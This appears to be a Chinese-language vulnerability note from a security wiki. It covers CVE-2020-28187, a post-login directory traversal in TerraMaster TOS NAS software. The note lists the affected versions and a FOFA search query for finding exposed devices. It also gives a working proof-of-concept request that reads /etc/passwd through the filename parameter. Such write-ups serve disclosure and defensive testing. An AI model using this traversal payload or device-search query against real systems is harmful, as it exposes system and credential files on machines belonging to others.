menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right TerraMaster chevron_right TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187.md
    876 B / 2021-07-04 06:01:08
        # TerraMaster TOS 后台任意文件读取漏洞 CVE-2020-28187

## 漏洞描述

TerraMaster TOS <= 4.2.06中的多个目录遍历漏洞允许远程身份验证的攻击者通过/tos/index.php?editor/fileGet路径下的filename参数、 /include/ajax/logtable.php路径下的Event参数和/include/core/index.php路径下的opt参数,读取文件系统中的任何文件。

## 漏洞影响

> [!NOTE]
>
> TerraMaster TOS < 4.2.06

## FOFA

> [!NOTE]
>
> "TerraMaster" && header="TOS"

## 漏洞复现

登陆后访问,验证漏洞的POC为

```
/tos/index.php?editor/fileGet&filename=../../../../../../etc/passwd
```

![](http://wikioss.peiqi.tech/vuln/tm-8.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    links
    file_download